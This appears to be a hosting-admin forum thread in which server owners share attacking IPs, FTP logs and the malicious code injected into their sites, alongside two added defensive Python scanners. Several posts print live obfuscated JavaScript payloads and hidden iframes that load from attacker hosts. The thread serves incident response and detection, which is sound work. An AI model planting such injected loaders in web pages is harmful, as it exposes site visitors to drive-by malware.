  1. #16
    Member
    Join Date
    Nov 2006
    Location
    Houston, TX
    Posts
    300

    Default

    Feel free to start a new post where admins can post security tips, helpful notes, etc.

    We are asking for attacking IPs in this thread for information-gathering purposes. We aren't creating a list of IPs to delete or anything like that. We just need a few IPs that are known to attack several different servers to help us gain an understanding about what's occurring during the attacks and how they are being propagated.
    -Todd Shipway

  2. #17
    Member
    Join Date
    Nov 2002
    Posts
    83

    Default

    This morning I have 4 servers infected with iframes. These accounts were accessed by FTP.

    ip: 58.65.239.10

    PHP Code:
    <iframe src='http://ltraffic.biz/resource.php?id=4531&user=Nikson' width='1' height='1' style='visibility: hidden;'></iframe
    I hope this helps.

    Ronald

  3. #18
    Member sehh's Avatar
    Join Date
    Feb 2006
    Location
    Europe
    Posts
    461

    Default

    We've seen lots of FTP attacks from: 72.95.215.3

  4. #19
    Member
    Join Date
    Sep 2004
    Location
    inside a catfish
    Posts
    963
    cPanel/Enkompass Access Level

    Root Administrator

    Default

    Quote Originally Posted by mooony View Post
    This morning I have 4 servers infected with iframes. These accounts were accessed by FTP.

    ip: 58.65.239.10

    PHP Code:
    <iframe src='http://ltraffic.biz/resource.php?id=4531&user=Nikson' width='1' height='1' style='visibility: hidden;'></iframe
    I hope this helps.

    Ronald
    What percentage of accounts on each server? Or are you saying EVERY account on four servers had this happen?

    Mike

  5. #20
    d_t
    Member
    Join Date
    Sep 2003
    Location
    Bucharest
    Posts
    239

    Default

    FTP connection with user password from: 77.221.133.186

    Code added to index.html:
    Code:
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;} document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
    The code contains links to:
    Code:
    http://77.221.133.188/.if/go.html?19427401f
    http://77.221.133.188/.dif/go.php?sid=1
    http://77.221.133.189/.sp/in.cgi?p=t
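
The injection in the post above hides a second iframe inside a hex string that the page decodes with `String.fromCharCode(parseInt(pair, 16))` at load time. The following is an added example, not code from the thread: a static scanner that decodes such hex layers without executing anything and lists hidden iframes at every layer. The sample page, the `dec` name and the `example.invalid` hosts are constructed for illustration.

```python
import re

# A quoted run of at least 20 hex byte pairs, as used by the document.write() wrapper.
HEX_LITERAL = re.compile(r"['\"]((?:[0-9A-Fa-f]{2}){20,})['\"]")
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
# src may be quoted, unquoted, or backslash-quoted inside a JavaScript string.
SRC = re.compile(r"src\s*=\s*\\?['\"]?([^'\"\\\s>]+)", re.I)
HIDDEN = re.compile(
    r"visibility:\s*hidden|display:\s*none|(?:width|height)\s*=\s*\\?['\"]?[01]\b",
    re.I)

def decode_layers(text, depth=0, max_depth=3):
    """Return [(depth, text)] for the page and each hex layer found in it."""
    layers = [(depth, text)]
    if depth < max_depth:
        for m in HEX_LITERAL.finditer(text):
            inner = bytes.fromhex(m.group(1)).decode("latin-1")
            layers += decode_layers(inner, depth + 1, max_depth)
    return layers

def hidden_iframes(html):
    """Return (layer depth, src) for every iframe styled or sized to be invisible."""
    hits = []
    for depth, text in decode_layers(html):
        for tag in IFRAME.findall(text):
            if HIDDEN.search(tag):
                src = SRC.search(tag)
                hits.append((depth, src.group(1) if src else None))
    return hits

# Constructed sample: one plain hidden iframe, one legitimate embed, one hex-wrapped iframe.
_inner = ("<SCRIPT>document.write('<iframe src=\\'http://malware.example.invalid/go.html?'"
          "+Math.random()+'\\' width=516 height=381 style=\\'display: none\\'></iframe>')</SCRIPT>")
SAMPLE = ("<html><body><h1>Welcome</h1>"
          "<iframe src='http://tracker.example.invalid/r.php' width='1' height='1' "
          "style='visibility: hidden;'></iframe>"
          "<iframe src='https://video.example.invalid/embed/1' width='560' height='315'></iframe>"
          "<script>document.write(dec('" + _inner.encode().hex().upper() + "'));</script>"
          "</body></html>")

if __name__ == "__main__":
    for depth, src in hidden_iframes(SAMPLE):
        print(f"layer {depth}: hidden iframe -> {src}")
```

A hit at depth 1 or deeper means the iframe exists only after decoding, which a plain grep for `<iframe` over the webroot would miss.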

  6. #21
    Member
    Join Date
    Jul 2004
    Posts
    212

    Default

    Sadly, it happened to me today.

    WARNING: do not run this code. It also tries to redirect to blacksun-sl.com/arm/index.php

    <!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,22,35,48,8,18,24,29,21,0,0,0,0,0,0,36,60,52,47,43,44,3,62,15,9,0,55,19,5,40,57,42,56,33,34,26,7,61,11,27,12,17,0,0,0,0,53,0,37,59,25,6,10,51,13,54,23,45,20,38,41,2,49,46,30,16,28,50,58,32,4,31,1,14);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsKW28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")</script><!-- ~ --><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,22,35,48,8,18,24,29,21,0,0,0,0,0,0,36,60,52,47,43,44,3,62,15,9,0,55,19,5,40,57,42,56,33,34,26,7,61,11,27,12,17,0,0,0,0,53,0,37,59,25,6,10,51,13,54,23,45,20,38,41,2,49,46,30,16,28,50,58,32,4,31,1,14);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsKW28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")</script>


    1) First, this thing came from my personal FTP account

    Jan 24 01:14:03 main pure-ftpd: (myuser@88.255.94.114)

    2) My password was strong

    3) If there was malware/spyware, a trojan or a keylogger on my desktop computer? Well, give me a few days and we will know, because I changed the FTP password from all my machines and I will not use FTP, and will track /var/log/messages to see if this fellow can "guess" my password using his magic trojan, or if a very common DC has a sniffer in its network, which is not the case (it apparently started near an FTP session of mine, but I mean apparently, not clearly)

    4) PHP insecure permissions or scripts were not found on my server; I know how it is, and it was just pure-ftpd

    Before, with the "less-secure" proftpd, it didn't happen. I have been looking at these threads since Jan/2007 when they started

    Thinking of changing back to proftp

    5) Other customers weren't affected

    6) Some system crashes and lockup/freeze issues also happened near to this

    7) Kernel, cpanel, perl all up to date since the cpanel10 to cpanel11 change

    8) Also checked http://www.cpanel.net/security/notes...s_toolkit.html but this is not (for now) my case, as there is no rootkit or root access at all despite these successful FTP attempts

    9) chmod -w *.* in my public_html

    If the hacker does it again, I will disable my FTP USER permanently...

  7. #22
    Member ModServ's Avatar
    Join Date
    Oct 2006
    Location
    Egypt
    Posts
    228
    cPanel/Enkompass Access Level

    Root Administrator

    Default

    Quote Originally Posted by d_t View Post
    FTP connection with user password from: 77.221.133.186

    Code added to index.html:
    Code:
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;} document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
    The code contains links to:
    Code:
    http://77.221.133.188/.if/go.html?19427401f
    http://77.221.133.188/.dif/go.php?sid=1
    http://77.221.133.189/.sp/in.cgi?p=t
    The same here with the same IP

    Look

    Code:
    Jan 29 10:11:52 server7 pure-ftpd: (?@77.221.133.186) [INFO] New connection from 77.221.133.186
    Jan 29 10:11:52 server7 pure-ftpd: (?@77.221.133.186) [INFO] xxxxx is now logged in
    Jan 29 10:12:03 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/suspended.page/index.html downloaded  (4521 bytes, 18025.59KB/sec)
    Jan 29 10:12:04 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/suspended.page/index.html uploaded  (4401 bytes, 26.92KB/sec)
    Jan 29 10:12:05 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/index.php downloaded  (17803 bytes, 649.81KB/sec)
    Jan 29 10:12:06 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/index.php uploaded  (18785 bytes, 28.79KB/sec)
    Jan 29 10:12:07 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/login.php downloaded  (10275 bytes, 760.74KB/sec)
    Jan 29 10:12:08 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/login.php uploaded  (10332 bytes, 31.66KB/sec)
    Jan 29 10:12:09 server7 pure-ftpd: (xxxx@77.221.133.186) [INFO] Logout.
    !!!!

    What will be done about this ??

    ModServ for Hosting & Web Services Solutions
    URL: http://www.modserv.com.eg
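
The log in the post above shows the pattern to look for: one client downloads a file and uploads the same path a second later with a different size, file after file. The following is an added example, not code from the thread: a parser for pure-ftpd transfer lines in that syslog format that reports such download-then-upload pairs. The sample lines, user names, host and documentation-range IPs are constructed, and the `year` default is an assumption because syslog timestamps carry no year.

```python
import re
from collections import defaultdict
from datetime import datetime

# Transfer lines in the syslog format shown in the post above.
XFER = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ pure-ftpd: "
    r"\((?P<user>[^@]+)@(?P<ip>[^)]+)\) \[NOTICE\] "
    r"(?P<path>.+?) (?P<op>downloaded|uploaded)\s+\((?P<size>\d+) bytes")

# Constructed sample log (not taken from the thread).
SAMPLE = """\
Mar 03 09:00:01 web1 pure-ftpd: (?@192.0.2.10) [INFO] alice is now logged in
Mar 03 09:00:05 web1 pure-ftpd: (alice@192.0.2.10) [NOTICE] /home/alice//public_html/index.html downloaded  (4521 bytes, 900.10KB/sec)
Mar 03 09:00:06 web1 pure-ftpd: (alice@192.0.2.10) [NOTICE] /home/alice//public_html/index.html uploaded  (4801 bytes, 26.92KB/sec)
Mar 03 09:00:07 web1 pure-ftpd: (alice@192.0.2.10) [NOTICE] /home/alice//public_html/blog/login.php downloaded  (10000 bytes, 760.74KB/sec)
Mar 03 09:00:08 web1 pure-ftpd: (alice@192.0.2.10) [NOTICE] /home/alice//public_html/blog/login.php uploaded  (10310 bytes, 31.66KB/sec)
Mar 03 11:30:00 web1 pure-ftpd: (bob@198.51.100.7) [NOTICE] /home/bob//public_html/logo.png uploaded  (20480 bytes, 310.00KB/sec)
Mar 03 11:45:00 web1 pure-ftpd: (bob@198.51.100.7) [NOTICE] /home/bob//public_html/site.zip downloaded  (90000 bytes, 800.00KB/sec)
""".splitlines()

def find_rewrites(lines, window_s=30, year=2000):
    """Return (user, ip, path, size delta) for each file a client downloaded
    and then re-uploaded within window_s seconds."""
    pending, findings = {}, []   # pending: (user, ip, path) -> (time, size)
    for line in lines:
        m = XFER.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key, size = (m["user"], m["ip"], m["path"]), int(m["size"])
        if m["op"] == "downloaded":
            pending[key] = (ts, size)
        elif key in pending:
            t0, size0 = pending.pop(key)
            if (ts - t0).total_seconds() <= window_s:
                findings.append(key + (size - size0,))
    return findings

def suspicious_ips(findings, min_files=2):
    """IPs that rewrote at least min_files distinct files."""
    per_ip = defaultdict(set)
    for _user, ip, path, _delta in findings:
        per_ip[ip].add(path)
    return sorted(ip for ip, paths in per_ip.items() if len(paths) >= min_files)

if __name__ == "__main__":
    for finding in find_rewrites(SAMPLE):
        print(finding)
```

Legitimate editors also download and re-upload files, so treat a single pair as a lead and several pairs from one address within seconds as the stronger signal.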

  8. #23
    Member
    Join Date
    Sep 2007
    Posts
    6

    Default Heh Me too

    Heh I just got done over as well...

    58.65.236.33
